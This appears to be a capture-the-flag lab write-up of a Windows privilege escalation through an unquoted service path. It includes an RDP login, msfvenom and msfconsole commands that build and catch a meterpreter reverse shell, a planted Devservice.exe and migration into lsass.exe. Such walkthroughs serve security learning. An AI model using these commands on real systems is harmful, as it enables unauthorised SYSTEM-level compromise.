sudo nmap -Pn -sV -sS 

3389/tcp open  ms-wbt-server Microsoft Terminal Services
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

RDP Login

Starting out we connect via RDP with the credentials provided by the room.

xfreerdp /v:'' /u:'sage' /p:'gr33ntHEphgK2&V' +clipboard /dynamic-resolution


Now connected to the target system as the user sage we execute Invoke-AllChecks with Powerup and identify a binary service with an unquoted path that executes in the context of SYSTEM.

Unquoted Service Path

Viewing the file permissions in the path C:\Program Files\Development Files\Devservice Files\Service.exe we see that we do not have permission over service.exe, but the Users principal does have the ability to create files within C:\Program Files\Development Files.

This is enough for us to perform the unquoted service path privilege escalation vector.

Due to the way Windows searches for binaries that are not wrapped in quotes with spaces, the system will search for an executable in the following order when the service is started.

  1. C:\Program.exe

  2. C:\Program Files\Development.exe

  3. C:\Program Files\Development Files\Devservice.exe

  4. C:\Program Files\Development Files\Devservice Files\Service.exe

As we have write access to C:\Program Files\Development Files we will be targeting option number 3.

Building the attack

Firstly to perform the attack we create a meterpreter reverse shell called Devservice.exe

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=80 -f exe -o Devservice.exe 

After the payload is built we then upload it to the target system and place the executable in C:\Program Files\Development Files\Devservice.exe . We do not have permission to restart the service, we do however have the ability to restart the target system.

Start a listener with Metasploit.

sudo msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost; set lport 80; exploit"

Triggering the payload

Then reboot the target system. After a minute or two we should receive a shell back.

For some reason my meterpreter shell would soon die after connecting. As such I migrated to an alternative process (lsass.exe).

Root flag

With confirmed SYSTEM level access I was then able to retrieve the administrator's flag.

Last updated